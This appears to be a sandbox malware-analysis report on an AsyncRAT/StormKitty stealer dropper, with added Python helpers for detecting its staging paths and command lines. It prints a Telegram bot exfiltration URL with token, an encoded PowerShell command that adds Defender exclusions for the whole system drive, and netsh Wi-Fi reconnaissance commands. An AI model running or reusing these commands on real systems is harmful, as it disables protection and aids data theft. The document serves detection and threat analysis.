Analysis
max time kernel: 149s
max time network: 151s
platform: windows7_x64
resource: win7-20230712-en
resource tags: arch:x64, arch:x86, image:win7-20230712-en, locale:en-us, os:windows7-x64, system
submitted: 13-08-2023 09:50
Static task: static1
Behavioral task: behavioral1
Sample: 69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe
Resource: win7-20230712-en

General
Target: 69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe
Size: 24.0MB
MD5: fe7a215f58c846f671142227e0a71061
SHA1: f40c456ce9f674ee93d3ef691c1b3aec0c53156b
SHA256: 69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827
SHA512: ff7efbd82997f802339407e709f074277ea609ac1f30ba1d768c5daac4a4990b7a731361717874fe98d524e0a012333e8b45ea1f83a1cc793fd0a06d8296b1ae
SSDEEP: 393216:VT4ER8LcdmjoDuUKQhgL9bH3x0PmFhpbgab/bKh17KfxRu7i4Kw5jnS01oufNTda:VT4ER0pjoNvhcX6u1blb/bEmZRGi4Lb5
Malware Config
Extracted
Family: asyncrat
Botnet: Default
C2: 127.0.0.1:6606
C2: 127.0.0.1:7707
C2: 127.0.0.1:8808
URL: https://api.telegram.org/bot6085983475:AAG9ma6AdbwS2Vmvqb_xIeiP1vbivSAPlXU/sendMessage?chat_id=1829819531
Mutex: AsyncMutex_6SI8OkPnk
delay: 3
install: false
install_folder: %AppData%
Note: all three C2 entries are loopback addresses, so the RAT component cannot reach an operator with this configuration. The Telegram Bot API sendMessage URL (bot id 6085983475, chat_id 1829819531) is the only remote endpoint in the extracted config and is the value worth blocking and hunting for.
Signatures
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 3 IoCs
resource                                                                      yara_rule
behavioral1/files/0x000d000000012282-61.dat                                  family_stormkitty
behavioral1/files/0x000d000000012282-66.dat                                  family_stormkitty
behavioral1/memory/2708-85-0x0000000000350000-0x0000000000380000-memory.dmp  family_stormkitty
-
Async RAT payload 3 IoCs
resource                                                                      yara_rule
behavioral1/files/0x000d000000012282-61.dat                                  asyncrat
behavioral1/files/0x000d000000012282-66.dat                                  asyncrat
behavioral1/memory/2708-85-0x0000000000350000-0x0000000000380000-memory.dmp  asyncrat
-
Executes dropped EXE 2 IoCs
pid   Process
2708  deneme.exe
2756  ngrok.exe
-
Loads dropped DLL 3 IoCs
pid   Process
2404  69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe (2 events)
2876  Process not Found
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 8 IoCs
description                   ioc                                                                                                                                     Process
File created                  C:\Users\Admin\AppData\Local\6a705ff963b832d927acbcde07d8ffcc\Admin@NYBYVYTJ_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini    deneme.exe
File opened for modification  C:\Users\Admin\AppData\Local\6a705ff963b832d927acbcde07d8ffcc\Admin@NYBYVYTJ_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini    deneme.exe
File created                  C:\Users\Admin\AppData\Local\6a705ff963b832d927acbcde07d8ffcc\Admin@NYBYVYTJ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini   deneme.exe
File opened for modification  C:\Users\Admin\AppData\Local\6a705ff963b832d927acbcde07d8ffcc\Admin@NYBYVYTJ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini   deneme.exe
File created                  C:\Users\Admin\AppData\Local\6a705ff963b832d927acbcde07d8ffcc\Admin@NYBYVYTJ_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini     deneme.exe
File opened for modification  C:\Users\Admin\AppData\Local\6a705ff963b832d927acbcde07d8ffcc\Admin@NYBYVYTJ_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini     deneme.exe
File created                  C:\Users\Admin\AppData\Local\6a705ff963b832d927acbcde07d8ffcc\Admin@NYBYVYTJ_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini   deneme.exe
File opened for modification  C:\Users\Admin\AppData\Local\6a705ff963b832d927acbcde07d8ffcc\Admin@NYBYVYTJ_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini   deneme.exe
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow  ioc
4     icanhazip.com
-
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies system certificate store 6 IoCs
The two thumbprints are the SHA-1 fingerprints of ISRG Root X1 (CABD2A79...) and DST Root CA X3 (DAC9024F...), the Let's Encrypt root chain. A bare Windows 7 image does not carry these roots; Windows fetches them through its automatic root update (compare the CryptnetUrlCache entry under Downloads) the first time a TLS chain needs them, so this signature is consistent with that mechanism rather than with the sample installing a root certificate of its own. The Blob values were not preserved in this copy of the report.
description       ioc                                                                                                                        Process
Key created       \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8                  deneme.exe
Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = (binary value not preserved)      deneme.exe
Key created       \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13              deneme.exe
Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (binary value not preserved)  deneme.exe
Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (binary value not preserved)  deneme.exe
Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (binary value not preserved)  deneme.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid   Process
2588  powershell.exe
2756  ngrok.exe (2 events)
2708  deneme.exe (5 events)
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
description              pid   Process
Token: SeDebugPrivilege  2588  powershell.exe
Token: SeDebugPrivilege  2708  deneme.exe
-
Suspicious use of WriteProcessMemory 38 IoCs
Identical events are grouped; the target process name in parentheses is taken from the process tree below.
pid   Process                                                                   wrote to memory of       procid_target  events
2404  69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe  2588 (powershell.exe)    30             3
2404  69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe  2708 (deneme.exe)        32             4
2404  69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe  2756 (ngrok.exe)         33             3
2708  deneme.exe                                                                896 (cmd.exe)            36             4
896   cmd.exe                                                                   2924 (chcp.com)          38             4
896   cmd.exe                                                                   2948 (netsh.exe)         39             4
896   cmd.exe                                                                   2956 (findstr.exe)       40             4
2708  deneme.exe                                                                2964 (cmd.exe)           41             4
2964  cmd.exe                                                                   2932 (chcp.com)          43             4
2964  cmd.exe                                                                   1036 (netsh.exe)         44             4
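The desktop.ini IoCs in the signature list show where the stealer stages copies of user files before they are packaged for exfiltration: a 32-hex-character directory under %LocalAppData%, a per-victim folder named user@host_locale, then Grabber\DRIVE-C\ followed by the original path. Recognising that layout in file-creation telemetry is a quick way to confirm a StormKitty run and to list which user directories were collected. The Python helper below is an added example for this page, not code from the Triage report or from StormKitty; the four sample paths are copied from the report, and the assumption that other builds keep the same directory layout is this example's own, so treat the pattern as a heuristic.

```python
r"""Recognise StormKitty grabber staging paths like the desktop.ini IoCs above.

Added example for this page; it is not part of the Triage report or of StormKitty.
Assumption: the layout seen in this report,
  %LocalAppData%\<32 hex chars>\<user>@<host>_<locale>\Grabber\DRIVE-<X>\<original path>
holds for other runs of the same builder. The regex is therefore a heuristic.
"""
import re
from typing import Dict, List, Optional

STAGING = re.compile(
    r"^(?P<root>[A-Za-z]:\\Users\\[^\\]+\\AppData\\Local\\(?P<id>[0-9a-f]{32}))\\"
    r"(?P<victim>[^\\@]+@[^\\]+)\\Grabber\\DRIVE-(?P<drive>[A-Za-z])\\(?P<orig>.+)$",
    re.IGNORECASE,
)

# Copied from the "Drops desktop.ini file(s)" IoCs of this report (constructed sample input).
SAMPLE_PATHS: List[str] = [
    r"C:\Users\Admin\AppData\Local\6a705ff963b832d927acbcde07d8ffcc\Admin@NYBYVYTJ_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini",
    r"C:\Users\Admin\AppData\Local\6a705ff963b832d927acbcde07d8ffcc\Admin@NYBYVYTJ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini",
    r"C:\Users\Admin\AppData\Local\6a705ff963b832d927acbcde07d8ffcc\Admin@NYBYVYTJ_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini",
    r"C:\Users\Admin\AppData\Local\6a705ff963b832d927acbcde07d8ffcc\Admin@NYBYVYTJ_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini",
]


def parse_staging_path(path: str) -> Optional[Dict[str, str]]:
    """Split a staging path into the stealer's working directory, the victim id and the file it copied.

    Returns None for any path that does not follow the staging layout, so the helper can be run
    over an unfiltered file-event stream.
    """
    m = STAGING.match(path)
    if m is None:
        return None
    return {
        "staging_root": m.group("root"),
        "run_id": m.group("id").lower(),
        "victim": m.group("victim"),
        # Rebuild the path of the file that was copied: drive letter + the part after DRIVE-<X>\
        "original_path": m.group("drive").upper() + ":\\" + m.group("orig"),
    }


def staged_directories(paths: List[str]) -> List[str]:
    """Sorted set of original directories whose contents the stealer copied into its staging tree."""
    dirs = set()
    for p in paths:
        info = parse_staging_path(p)
        if info is not None:
            dirs.add(info["original_path"].rsplit("\\", 1)[0])
    return sorted(dirs)


if __name__ == "__main__":
    first = parse_staging_path(SAMPLE_PATHS[0])
    print("victim:", first["victim"], "run id:", first["run_id"])
    print("collected from:", staged_directories(SAMPLE_PATHS))
```

Running it on the four report paths yields the victim identifier Admin@NYBYVYTJ_en-US and the four collected directories (Desktop, Documents, Downloads, Pictures); the staging root is the directory to acquire before the stealer deletes it, and the run id is a useful pivot for the same build on other hosts.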
Processes
Depth markers [1]..[4] give the level in the process tree; the SysWOW64 paths of the children show that deneme.exe runs as a 32-bit process on this x64 image.

[1] C:\Users\Admin\AppData\Local\Temp\69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe  (PID 2404)
    Command line: "C:\Users\Admin\AppData\Local\Temp\69a281695cfceb02aec31b7ecc8105a60d606b2fc168ab32964380cd5fa79827_JC.exe"
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory

    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2588)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAYgBmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAdQBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAbgBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBhACMAPgA="
        Decoded (base64 of UTF-16LE): <#sbf#>Add-MpPreference <#aub#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#pnl#> -Force <#lza#>
        This adds Microsoft Defender exclusions for the entire user profile and the whole system drive before the payloads are launched; the <#...#> block comments are empty junk tokens inserted to defeat simple string matching on the decoded script.
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    [2] C:\Users\Admin\AppData\Local\Temp\deneme.exe  (PID 2708)
        Command line: "C:\Users\Admin\AppData\Local\Temp\deneme.exe"
        - Executes dropped EXE
        - Drops desktop.ini file(s)
        - Modifies system certificate store
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\SysWOW64\cmd.exe  (PID 896)
            Command line: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
            Switches the console code page to UTF-8, then lists the names of the saved Wi-Fi profiles (the "All User Profile" lines).
            - Suspicious use of WriteProcessMemory
            [4] C:\Windows\SysWOW64\chcp.com  chcp 65001  (PID 2924)
            [4] C:\Windows\SysWOW64\netsh.exe  netsh wlan show profile  (PID 2948)
            [4] C:\Windows\SysWOW64\findstr.exe  findstr All  (PID 2956)

        [3] C:\Windows\SysWOW64\cmd.exe  (PID 2964)
            Command line: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
            Enumerates the Wi-Fi networks in range together with their BSSIDs (nearby-network reconnaissance).
            - Suspicious use of WriteProcessMemory
            [4] C:\Windows\SysWOW64\chcp.com  chcp 65001  (PID 2932)
            [4] C:\Windows\SysWOW64\netsh.exe  netsh wlan show networks mode=bssid  (PID 1036)

    [2] C:\Users\Admin\AppData\Local\Temp\ngrok.exe  (PID 2756)
        Command line: "C:\Users\Admin\AppData\Local\Temp\ngrok.exe"
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
-
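The three command lines worth automating a check for in this tree are the encoded PowerShell call (which hides a Microsoft Defender exclusion change behind base64 and junk block comments) and the two chcp-plus-netsh chains that dump Wi-Fi profile names and nearby BSSIDs. The Python helper below is an added example for this page, not code from the Triage report, AsyncRAT or StormKitty: it decodes -EncodedCommand (and the -e/-ec/-enc abbreviations PowerShell accepts for it), strips the <#...#> comment tokens, extracts any Defender exclusion paths, and flags netsh wlan reconnaissance. The sample command lines are copied from the process tree; the regexes and result field names are this example's own choices.

```python
"""Triage helpers for the PowerShell and netsh command lines in the process tree above.

Added example for this page; it is not part of the Triage report, AsyncRAT or StormKitty.
"""
import base64
import binascii
import re
from typing import Dict, List, Optional

# Copied verbatim from the report: the -EncodedCommand payload passed to powershell.exe (PID 2588).
ENCODED_PAYLOAD = (
    "PAAjAHMAYgBmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAdQBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAbgBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBhACMAPgA="
)

# Constructed sample input: the three command lines from the process tree (PIDs 2588, 896, 2964).
SAMPLE_CMDLINES: List[str] = [
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -EncodedCommand "' + ENCODED_PAYLOAD + '"',
    '"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All',
    '"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid',
]

# -EncodedCommand and the abbreviations PowerShell accepts for it; the argument is base64 of UTF-16LE text.
ENCODED_ARG = re.compile(r'-(?:encodedcommand|enc|ec|e)\s+"?([A-Za-z0-9+/=]+)"?', re.IGNORECASE)
BLOCK_COMMENT = re.compile(r"<#.*?#>", re.DOTALL)
DEFENDER_EXCLUSION = re.compile(
    r"(?:Add|Set)-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)\s+@?\(?([^)\s]+)",
    re.IGNORECASE,
)
WIFI_RECON = re.compile(r"\bnetsh\s+wlan\s+show\s+(?:profiles?|networks)\b", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script carried by -EncodedCommand, or None if it is absent or malformed."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None  # truncated or non-base64 payload: report nothing rather than crash the pipeline


def normalize_script(script: str) -> str:
    """Strip <# ... #> block comments (used as junk tokens here) and collapse whitespace."""
    return re.sub(r"\s+", " ", BLOCK_COMMENT.sub("", script)).strip()


def triage(cmdline: str) -> Dict[str, object]:
    """Summarise one command line: decoded script, Defender exclusions added, Wi-Fi reconnaissance."""
    result: Dict[str, object] = {
        "encoded": False,
        "script": None,
        "defender_exclusions": [],
        "wifi_recon": bool(WIFI_RECON.search(cmdline)),
    }
    script = decode_encoded_command(cmdline)
    if script is not None:
        result["encoded"] = True
        result["script"] = normalize_script(script)
    # Defender tampering may sit in the visible command line or only in the decoded script.
    for text in (cmdline, result["script"] or ""):
        m = DEFENDER_EXCLUSION.search(text)
        if m:
            result["defender_exclusions"] = [p.strip() for p in m.group(1).split(",")]
            break
    return result


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(triage(line))
```

For the report's PowerShell line the decoded, comment-stripped script comes out as `Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force`, which is the finding to alert on: an exclusion covering the whole system drive disables Defender scanning for everything that follows. The netsh checks fire on both cmd.exe children; they match the inner command, so they also catch the same recon when it is run without the chcp prefix.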
Network
MITRE ATT&CK Enterprise v15
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize: 304B
MD5: 110500207a3b309a629c75b6299132ea
SHA1: ac88649cfdac4e88ca7219c466654fb6276204fe
SHA256: 6440dfe55c5e60c3c09923fb6734df1b68104ac03dc7a8d30324c88fce64f9ae
SHA512: e74cb4c63241a13abff1b2ce2dc5bfb5863cc3338872ee6e8faeb5e5551ca04df704d8f1ae94acf313c9e3279cc29c8a2ceb8254cf6d9c4e46c075cb6d399f92
-
Filesize: 1B (these are the hashes of the single ASCII character "0")
MD5: cfcd208495d565ef66e7dff9f98764da
SHA1: b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256: 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512: 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
Filesize: 62KB
MD5: 3ac860860707baaf32469fa7cc7c0192
SHA1: c33c2acdaba0e6fa41fd2f00f186804722477639
SHA256: d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904
SHA512: d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c
-
Filesize: 164KB
MD5: 4ff65ad929cd9a367680e0e5b1c08166
SHA1: c0af0d4396bd1f15c45f39d3b849ba444233b3a2
SHA256: c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6
SHA512: f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27
-
Filesize: 170KB (two entries in the report with identical hashes)
MD5: 958062458cd994df325348bb9f8f9d11
SHA1: 6d678d971f4239f9304a3a6ac9941b9d7de1ba27
SHA256: 109f96c67f55689c41320f832134501ec02389a813eba1d990d192ab378ad533
SHA512: e73c665f0cd3cc53ea4ca0ef50d196fce4783488759bd9f6b8d9cb842382e88327509a317dd328ddf7b7fc988cde06a46cd82fe2783165f75d5f812e231affff
-
Filesize: 23.8MB (six entries in the report with identical hashes)
MD5: 1c900bf7791f168639d27e19a90a9be7
SHA1: ff6b857b8aaf8d9ed72ae300575aeb4ff21925db
SHA256: b25a372ebb6692fbc2d3697467a7611dbbd521dd61ed995fa82c170c3ef50300
SHA512: c0a96693031c56b4375478e7c15f41ef512b7eec72496e26dcb5dc688b13431852e2c30f98ef25a2d06df421e8c688b17fa603887ef3ae6980c6ee3789fe2988